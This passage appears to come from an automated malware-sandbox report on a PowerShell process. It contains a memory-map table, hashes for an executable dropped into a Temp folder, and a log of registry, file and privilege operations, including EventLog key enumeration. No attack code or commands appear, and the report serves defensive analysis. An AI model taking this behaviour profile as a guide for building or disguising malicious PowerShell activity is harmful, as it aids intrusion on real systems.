| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00230000 | 0x00233fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b60000 | 0x01b60000 | 0x01c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x01c60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01c80000 | 0x01caffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01d2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01e0efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01e8ffff | Private Memory | rwx |
|
|
|
- |
| sortdefault.nls | 0x01e90000 | 0x0215efff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02160000 | 0x021c5fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000021d0000 | 0x021d0000 | 0x021d2fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000021e0000 | 0x021e0000 | 0x021e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000021f0000 | 0x021f0000 | 0x021fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x0221ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022a0000 | 0x022a0000 | 0x02692fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x027a0000 | 0x027a2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027b0000 | 0x027b0000 | 0x027b0fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x027c0000 | 0x027c4fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x027d0000 | 0x027d7fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x027e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027f0000 | 0x027f0000 | 0x027f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x0280ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002810000 | 0x02810000 | 0x02820fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x02a30fff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02a40000 | 0x02a80fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02b2ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002b80000 | 0x02b80000 | 0x02bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c00000 | 0x02c00000 | 0x1abfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001ac00000 | 0x1ac00000 | 0x1b2cffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x1b2d0000 | 0x1b38ffff | Memory Mapped File | rw |
|
|
|
- |
| mscorrc.dll | 0x1b390000 | 0x1b3e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000001b410000 | 0x1b410000 | 0x1b48ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b490000 | 0x1b771fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000001b780000 | 0x1b780000 | 0x1b87ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x753a0000 | 0x75468fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13f7f0000 | 0x13f866fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedec00000 | 0x7fedf2a4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fedf2b0000 | 0x7fedfe0cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fedfe10000 | 0x7fee0832fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee0840000 | 0x7fee171bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorjit.dll | 0x7fee18d0000 | 0x7fee1a53fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fee1a60000 | 0x7fee1bf4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fee1c00000 | 0x7fee1d6bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee1d70000 | 0x7fee270cfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fee27a0000 | 0x7fee27ddfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fee27e0000 | 0x7fee28f7fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fee2900000 | 0x7fee2b15fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee2b20000 | 0x7fee2c04fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee2c10000 | 0x7fee2cb9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee2cc0000 | 0x7fee2fedfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee2ff0000 | 0x7fee30a1fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee6160000 | 0x7fee61c8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee61d0000 | 0x7fee6268fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef2fe0000 | 0x7fef3011fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef3020000 | 0x7fef308efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00010000 | 0x7ff00010000 | 0x7ff0001ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff000cffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000d0000 | 0x7ff000d0000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff0014ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00150000 | 0x7ff00150000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 72 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe | 510.50 KB |
MD5:
94df3603fba467e0fff637c55c8b6d1b
SHA1: 93f6cd1834a402f78497d2978d3a3a58ec3bfd66 SHA256: 4f9eb9ef4ef021679de344f227bc6e162f1e5bcc6950d63ee870718380c58016 SSDeep: 12288:mw4zMV6fcJUCT+ZiO852/Ico+/fT3aBtYg:P8fcJUCTjOy2eGT36tx |
|
|
| C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
Threads
Thread 0xa84
285
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
8 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | type = file_type |
|
2 | |
| File | Read | size = 4096, size_out = 4096 |
|
3 | |
| File | Read | size = 4096, size_out = 3315 |
|
1 | |
| File | Read | size = 781, size_out = 0 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Read Value | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Get Key Info | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
